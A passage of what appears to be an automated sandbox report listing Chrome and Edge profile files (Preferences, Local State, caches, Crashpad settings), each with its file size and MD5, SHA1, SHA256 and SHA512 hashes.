                                                                                                                                                                                                                                                                                                                                    970fe1d81218a492e883ac2876845f9a1a73417e9b205593bc96d5b6fda2bccdd8431f4c32ae97ef2260049fc8411bd8bdfcc40fc25e2e69a9ad8b5af9731144

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    11KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    71f010dc46ac8d021ae86ba00814a128

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    0c83db50f72cc90007ec3bb3426d20ab2c2ffb53

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    b6ad1bce001c67c485b7616db97b537de37f6d6bf69397deff5c3ca66be0196e

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    96ee34deac842ca6735d9b3407e5501aee8c393ff3dd0e093da8e27ed1652c642e3685338f89244f6eaf89d65d5e1696b1c36ffa98c7061c013ac053c0d4d03b

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    11KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    44e6387261aa2fdf0d2170c394f584b2

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    f643f64c37de33fdb5501bcedad0ada8baf6ff32

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    5e4e7e3c46c39fe8e0bd47c7f1fb42a090d2d279aaf3a4be0b14f9a4093e8870

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    8cdc1e7065cac5dc040b9ae763dd1b21c44e340c05348d27ac1f7c8f8c4a9c288fca4b0ef62f0f17da38a9d2af72f20020963bd13954fb6b7b448539e3fe7c26

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    11KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    fb7f041d3f2ba9d56af5b03f9448055c

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    3c2be63a70dd2f14bec335fbfcb36a983f45b743

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    31410796d11bf5e1e81aca1f1cea771b71ef4ecf76e16faa9054d6733d8f4b7d

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    2d8a4bf62a4b933d01390afd3d1d8b8c4be72ac3cb8fef7568d8fe7281819cc809a67bafd54df99b5930bce7e608027d7cb7fdbe98dd3b8cc63c368ad34ea0fb

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    15KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    104e6288001b904afb53514deec190a6

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    289faac9dc9384e1d01858b8d7c48263bd316f08

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    a23dc1839529c04291ca1fcaa6f570f33b8887176c71e3fb194ba29ccf97bfe0

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    5ad083b14c538e307383d10ce7c62df6a07d82fabe601843bd10c66da67eabef90d12168be99eb47162fd9922f7c9b9d2e78951042d945c726b4fd08e9160980

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    96B

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    a90c3ec294870f5d7120336ffcf2ef4b

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    5590a9e6215b223d6cfd6d8b52b8c6df2008c723

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    d7c8dd47743581864b34e01fb0ffe185b5d9d25099e35e368e9e781d410ef2c4

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    dd310dbb42e1657fcef6ddb9c491600690d8eb0d3fc20e2f78038168566555d8f3ce930d53c513efbc55f4602df34d85efe409b26a209042722e6e1ecfc32086

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    72B

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    5486b4244204c6549d19cbb7fe2abf61

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    558f5ac4cdddf639ee3842c4b40035d6045d205d

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    689b28fb4af450e8be963c868175fa8d785fd2e175a5517f062f0852d4d1195b

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    453f197ee3c686c15f31d6dc51d81813e24aa7a89ba7e18ee4d9060d04972d9ef06e1805c1fc80b2bf7a884806499342047c7bd4575c803c3e0901ed77b0ce76

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    232KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    167aa87605532b24e6ceebb2fa5656f5

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    8d69587b52b6c898b3891c7c2fbbcf329a9943af

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    1682974d4fd3356602c7c681654228a8fcf9ffab9fcd2fd15709b199511793ab

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    af0021ee1d7de0990c9da115ca317320a09f530a315d957abb271c924599fc46be268f76ac98507420112718b9e9a6e40bad1a678baa9614b6ffecf03615c010

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    232KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    2456e484e29ef9a1961227c8164a9bce

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    f12c10820bf2e2e0bbe51bf7055bfe7e11cd9db7

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    5548b53b1489cfbbd72ff9c5ae4926f0a3529316f93174843ed207cc99f69715

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    8816df101e93b6d090adbfcc7d69f9d5c7d6a1fbafa235be1606a936bb9482287655b089fe8443eb19be04238c69b9c32518a650f9c3f40e16187a1955d5caed

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    232KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    71c195150501226d1e2e578decbc8605

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    6e7be3e551731b5ecdca5a392dbd9922beb6f12e

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    ad105955a2af37329accf04ca6653383303a2136f2baa9feaa62f1f35f12c767

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    63bbf5e5c16379da0230875a75f3433e0efab338fb8d5bbd3a8df709238ec5e466ac42a637e5fb4229ff950f82a6903125e9f4deeea77064f92308e3a4d0689b

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    232KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    a0db055b9bf01a6d9edd15781c66e10d

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    c6d89b671780bcb60548df297ddde803569ee66b

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    115a84c05ce413b049d55eb245a1107014bb724be241595031817f7c386cd0c2

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    e17a5a632bbf5e7135d67793bd45578302916571bc8f610096024a8ec961b521c8b767d61e2bb48a8643a11c03af545d9d0d9a6f56fcb7168bc5175ace17337f

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    232KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    63575dabd00c39a1cffc5096e9b8becc

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    dca8b5e843226c0ff4026323acb843bc8ac3b3cd

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    59dc5692343e3c4eabb831b0f7f96cf9f57656f76c495a366e81ab1e72d73974

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    38bcdf9b0e66ddbe56cdc1d3c594ac085b5ed69f5c35a026d610c05da9a0b2e4a1aa23c9fc39f79ea27460346a954d521dfbf55afbc6d5e4d4b32c772224ed2f

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    5d032e775a8a511a0361b1e84a5a7849

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    48acafda8558a6a5dd5b64751c270a78deff6fdd

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    c183c62dc508e8dbeae1365cd674da725466deae751fa28ac3cee27c726396ea

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    d256ea768dfadb65a846c77807fae8f795298a3b17868b95bf45988246c5f1dde95561c2ad379548cd94c9fc01c6736335c5bed5465146faabc7f12482502cfc

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    152B

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    ffc39812e2fcd5adcd109fff6e72c856

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    927e636b225729179e43d8d731e3e4552a4f6405

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    0f33fce94f0ebc3522f3d32883771a853a9041a4a59632a70033f12ec352d754

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    da84d9e272245762fd8eb693b83b1beca59d513477e99f798c34f3ce7aeba263ad97834f8c315eb9fcade7d21c1925c13083d411f7fac7bf18594b860c57d6fb

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    152B

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    fa08bcd1df14c40ddc4fede93dc06a0a

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    170c388746addef58d15395f74475aaca584d56e

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    edbf584a85f730f225262aad0fcd30616df661d552313b882f4f9a0adbc258c8

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    b14cdf11b073666283311593c43f56e5288425b0c492202c727734292d9d6a7d2815e21e0c726a58b1667ecfaed27c4cff7e28315e949768e103d36a214f56ff

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    152B

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    61cef8e38cd95bf003f5fdd1dc37dae1

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    11f2f79ecb349344c143eea9a0fed41891a3467f

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    152B

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    0a9dc42e4013fc47438e96d24beb8eff

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    806ab26d7eae031a58484188a7eb1adab06457fc

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\43842f62-9704-45fb-87e3-7e2aa9e57fc4.tmp

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    1B

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    5058f1af8388633f609cadb75a75dc9d

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    100KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    f134fda98a277b1c8f20ab8fbe2fbd58

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    a922796190a1f5bbb3c410c6ec591502050df04e

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    27bce9e85eaf3567a4695ba2b612e32615394d80d0a3a2dcb07b1fbfdfababc7

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    2b2e8338afb9b0ca9b5fa3d452dfd80368b5d17566120ae6351b6d03572e5a69cedb97f165fbc31ffb3addcc00506a3fc0761cf2404a5d9826a8448a7c4d9f17

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    1KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    8d0b2b6d907832e871bb64c5b0962518

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    5a8b3709b75a5199697973d3b5dbb4eeae695299

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    c2fcb514aa94a206345dd96e27678dcdd9e70d0002a0cf03c712ac326a4be00f

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    ee690e0b0e25c5a8cbe7878df1553cb4e9a6c4e2179d012a74cddbd361b49f521c793d3c100add358152f0e46da50bc53cbe4f6dd1ea7a7d682bf229e55a0b81

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    1KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    f3ec6785d0922011896357b158e11e7c

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    96828ad0b9e368899a5b9e04ea2771b6c499c691

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    ea6aa1ed50c17ef0e7ac654b42c9bf754be1fae9869adc7022d3a866406a645e

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    e3ed074b613703e17b694f90854d662a176765db12182bad35921620488d5b842487bc5bb934dfb3b1440ad4138b7bfe66807488acce95dda685cbab8f2ea193

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    1KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    76b194707eb6f7d7a8e86c7c4642b841

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    08a4eec4c85474e5351edbfa28732b3bf2dc7ce1

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    a22660c64b91ccff09d63fe88e1d91c18edfa49f7160247d5f6d0b599563b65f

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    45e2586f9c78b5a21134e52b6844a4bfabbb723e6a77c266ec15212bc74b8b8eddc113eb7149bc641dd844707824a05efebaeef2a530c9957f79fbcae86cfce6

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    264KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    bceaf65f08e5d5cf818b03a7ed338626

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    7dfacbb840fdac079bb004a3a2ea4e2daecc06ee

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    d000bbfa98118af110acec5845c53e39762f7b92875c3e677a5e86db1554bac5

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    0f07e95d22049371079dc1fe0b6243978475f904e314462844cad8513058233f2c73a0d59a1c40d2f64be79758682471700aa6bab34de99e3c2ef3563d433cae

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    522B

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    1284119f5c184bef927c05b7ddbf1042

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    e66d9e9d5f1334b416fcb132d9d40813f523a045

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    a89f0ffb6f696614315f6349d14979d194b452cf18194703c2996eac030078dc

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    50c122bb0c9ba6622cfbd1b61876af84f0845b9925f95644006ac8b12a2912f003c5e27b5d40a6d13121554e1e74547694215900a03b468dac538de97a68e105

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    1KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    cf8805c938ee20db06427d1d152da14e

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    9f2f268605fa17bfad8ff9c311c249facaad81a3

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    20c0d13650300a9f2706bedd58444d666642daa9a0856238149b2a5b3d5b52fe

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    59acfd91246bfa2840a4ce96672fe176dbaed3626a4b2422d1ec478125435762f4a888d8427c05f5c0c74c81d469663c354e73e2f0d05b37b9457b6c0cc1d1fc

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    1KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    d8daa269f2ea78a63f146dddb348c325

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    1ff27d9a87937770b7e08d656e52c48f222aba0d

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    07a92a342003dfe770429cbce8440e1632057d5794e7a24582299a16339e970f

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    1898cff2002339b2c992b8ad8d197cb7fe4eaf3ccc17aecbb60bd4b8630061e5c5ea8fc8007ee9883ad2c5594cb8c8a5f4982b9fd60367791961573f36536e0b

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    1KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    60a6457c8b25c11f700a1f11519c5421

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    1175c0d7a1f5877d7a3da99dd32a0b2d7ca01bed

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    af82edd9053c78de827136a3cea82b41af8746757d790be10129756d8be128cf

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    d061448f784d4ade918fb14fbb13082242fe8fa2451f1f0b12806fa7959423a5159a061b821a5a05dc418b58ff77eda98e1fc8b3649fa05d48682035d59fb7f4

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    3KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    b0ea0adcff0ea5508570ea721d448125

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    b97f9e30ce809d0db74703f3313243077fec74f2

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    0764b1afa53e48c5cdf79223297f9f90805f27d5c258bf5f8375f69a1fa2f950

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    730cd3f50dfe8327ec591bba8b220176142824f68befbd4ed9735f6a20442a40f127aa555b9ad4ebbf13402ffcb82361c7ff1e108af23d59418c249cfc7c21ec

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    6KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    5c33a5f44a2210e2bad494b3f1a48a12

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    3d7ddc773d87d2bc393df4cc365e9e0cd2224730

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    ad431d1e33f952576de661ea23db4c6ff5ba1a08c82e90578c1567522b6e92e3

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    7124af497c05d5af5a1c1d4493aa2e212d34211fa35754da6eb8c377e56535ac025982de4cc2f9677341cacebe59f7692ac88c95cb45115b2d1a2c563135808d

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    7KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    0a70c55338581c7e937366cbe58a1159

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    bcfaf5039389ef18f5f8ea53d77ee86c3634b352

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    96b365540723b4b773a5505f0baaa27fd44dbf48f0b7b8f05bb37bb602679a2b

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    52c1a8323cdf57ecafcea77c85aa297f6a997dc763606123400d8b791b71215995307f4b802b693c65c33652ec3a41eeed2357390a502565715616dccfef93f9

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    5KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    ab9f958c988c696e9b256f998d269735

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    2aa91a9c9dced85197207aeddfc15fa4cf8c5486

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    30a1829d7707bd0683877ce671647a5c675b4ad3dcc48877650f1a909c11dff1

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    f0fb19f0b9b9ea219168ba0dcc8e8fa4b75598c3ca4b560cea69a0f4fcda6eca26083cebdee50c02404a1bc9830dc38e5856c47c0d75dd2132c1459d59a234b3

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    17b2a780234cc7cf0a3c5c960768e3d5

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    ae783fa826e4e2f6d4586dc79058e939b6fc9170

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    c2191313fb78924875aa391cb5ff233f456d67c2858031df433d59214502405b

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    b96cb52715463cad95eae3508901c43680cc087aa8757274ecd8a237b55cb97aab8352704ab8532e16a6ad2fb72788bc6efd4aab5876bd3eef9f75032d40d91e

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                                    Filesize

